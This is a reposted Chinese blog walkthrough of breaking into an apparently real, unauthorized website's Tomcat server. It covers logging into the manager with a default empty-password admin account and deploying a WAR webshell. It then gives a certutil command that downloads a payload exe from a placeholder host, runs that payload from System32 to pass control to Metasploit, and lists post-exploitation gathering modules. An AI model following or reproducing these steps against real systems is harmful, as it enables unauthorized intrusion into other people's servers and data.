TomCat Getshell拿服务器权限实战
2023-3-11 08:30:37 Author: 橘猫学安全(查看原文) 阅读量:18 收藏

文章来源:UzJu的安全屋

原文地址:https://uzzju.com/?id=56

0x00 前言

无意中接触到一个网站,所以索性尝试一下,都是一些基本操作,大佬看看就可以了奥。注:由于保密问题,所有关于对方信息网址等各项信息都将保密打上马赛克,能打的都打上马赛克。

0x01 Tomcat入口

tomcat默认有个manager的管理后台app,密码存放在conf/tomcat-users.xml里面。如果tomcat是外网开放的,那么这个manager服务也是开放的,http://主机:端口/manager/html 可以看看是不是通的

首先我尝试一下默认账号admin 密码为空 发现可以进去 那真是太好了

登录进去之后

可以看到有一个上传war部署项目的,那么就用IDEA 打包一个webshell大马 部署进去即可,首先需要一个自备的webshell大马

随便找一个,然后打开IDEA创建一个项目

一直Next即可,然后把webshell拷贝到scr目录

选择Project Structure

选择Artifacts,然后再选择webApplication: Archive

打勾include in project build然后点击+号选择module Output

选择项目即可

然后选择build

选择build Artifacts

完事之后呢,上传部署即可
点击Deploy之后就可以看到

多了一个xssx,那么访问那个目录即可

命令执行 ipconfig,可以看到内网192.168.0.128,看看用户呢

0x02 权限移交MSF

尝试使用shellcode制作payload

编译后利用webshell上传到服务器,有最快捷的方法把payload上传到服务器(记得一定要内网穿透)

第一种就是使用CMD的命令certutil(然后使用CMD命令运行即可)命令:
certutil -urlcache -split -f https://www.xxx.com/test.exe
第二种就是使用webshell的上传(同理,使用CMD命令运行PAYLOAD)
使用webshell来到服务器的C:\Windows\System32\目录下,然后uploadfile

Jie.exe就是我们上传的payload,直接使用CMD运行

start C:\Windows\System32\jie.exe

内网的IP为192.168.0.128

0x03 信息搜集

1. 查看路由

2. 查看系统信息

3. 进入CMD命令行 然后Net User查看用户

4. 调用 post/windows/gather/dumplinks 来查看最近访问的文件

5. 调用 post/windows/gather/enum_applications 来查看目标主机安装软件的信息

这些都是常用的一些知识,平时一定要熟记于心的

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247506028&idx=1&sn=40acbb662a5d0e68f83b1132da2a3b07&chksm=c04d5f52f73ad6442317b2a0e3020f1351ea1e16ff8067bf16a07938553638ee599fda0d1646#rd
如有侵权请联系:admin#unsafe.sh